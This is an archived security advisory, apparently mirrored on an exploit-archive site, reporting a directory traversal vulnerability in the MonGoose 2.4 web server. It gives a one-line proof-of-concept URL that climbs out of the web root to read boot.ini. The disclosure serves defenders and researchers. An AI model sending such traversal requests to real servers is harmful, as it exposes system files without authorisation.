AOH :: HP Unsorted M :: VA3161.HTM

MonGoose 2.4 Directory Traversal Vulnerability



MonGoose 2.4 Directory Traversal Vulnerability
MonGoose 2.4 Directory Traversal Vulnerability



######### MonGoose 2.4 (win) webserver Directory Traversal  #########=0D
=0D
=0D
=0D
######By:  e.wiZz!=0D
=0D
######Site: www.balcansecurity.com=0D 
=0D
=0D
=0D
Found with ServMeNot (world's sexiest fuzzer :P)=0D
=0D
=0D
=0D
=0D
In the wild...=0D
=0D
#########################################################################################=0D
=0D
[Info]: Easy to use web server for Windows and UNIX. Mongoose provides simple and clean API=0D
 for embedding it into existing programs. Targeting Web application developers, embedded system developers,=0D
 and people who need to setup file sharing quickly.=0D
=0D
[Site]: http://code.google.com/p/mongoose/=0D 
=0D
=0D
[Vulnerability]:  =0D
=0D
http://[localhost]/../../../../../../boot.ini=0D 
=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.